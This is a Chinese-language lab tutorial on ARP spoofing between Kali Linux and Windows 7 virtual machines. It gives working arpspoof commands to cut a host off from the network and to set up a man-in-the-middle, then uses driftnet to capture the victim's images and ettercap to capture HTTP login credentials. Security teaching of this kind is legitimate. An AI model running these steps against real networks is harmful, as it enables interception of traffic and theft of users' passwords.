目录
1、ARP(Address Resolution Protocol)
一、实验原理
1、ARP(Address Resolution Protocol)
地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议
2、ARP欺骗
又称ARP毒化(ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网上上特定计算机或所有计算机无法正常连线。
常见的ARP欺骗手法:同时对局域网内的一台主机和网关进行ARP欺骗,更改这台主机和网关的ARP缓存表。
二、实验环境
软件:VMware Workstations14以上版本
虚拟机:Kali-Linux、Windows 7
三、实验前期准备
1、安装dsniff
arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff
arp-get install dsniff
- 更换更新源为阿里云,原有的更新源加#号注释 #vim /etc/apt/sources.list deb mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src mirrors.aliyun.com/kali kali-rolling main non-free contrib
- 修改完成后执行apt-get update命令完成更新
- 重新安装命令,apt-get install dsniff
2、安装driftnet
kali 中利用driftnet工具,可以捕获win7机器正在浏览的图片. Driftnet是一个监听网络流量并从它观察到的TCP流中提取图像的程序。
arp-get install driftnet
四、ARP断网复现
1、查找kali的IP地址和MAC地址
ifconfig
2、查找win7的IP地址、MAC地址、网关地址
使用ipconfig指令查找对应的地址
ipconfig
使用arp -a查找对应arp缓存表
arp -a
通过网关的IP地址,找到对应的mac地址
3、主机扫描
这里扫描的是192.168.111.0/24网段的存活的
fping -g 192.168.111.0/24
4、断网攻击
- arpspoof -i 网卡 -t 目标ip 网关
- -i后面的参数是网卡名称,-t后面的参数是目的主机和网关,截获目的主机发往网关的数据包
arpspoof -i eth0 -t 192.168.111.130 192.168.111.2
开始攻击后,win7无法连接互联网
查看win7的arp缓存发现win7网关的物理地址已经发生变化
五、ARP欺骗利用
与ARP断网不同的是,ARP欺骗不仅使目标ip的流量经过我的网卡,还要从网关出去
1、设置ip流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward
2、在ARP欺骗前,查看是否可以正常上网
3、进行ARP欺骗
arpspoof -i eth0 -t 192.168.111.130 192.168.111.2
4、使用driftnet工具捕获win7机器正在浏览的图片
driftnet -i eth0
5、使用ettercap获取HTTP账户密码
ettercap -Tq -i eth0
在win7浏览器登录界面输入账号密码
返回kali,可以查看到刚刚win7中的登录信息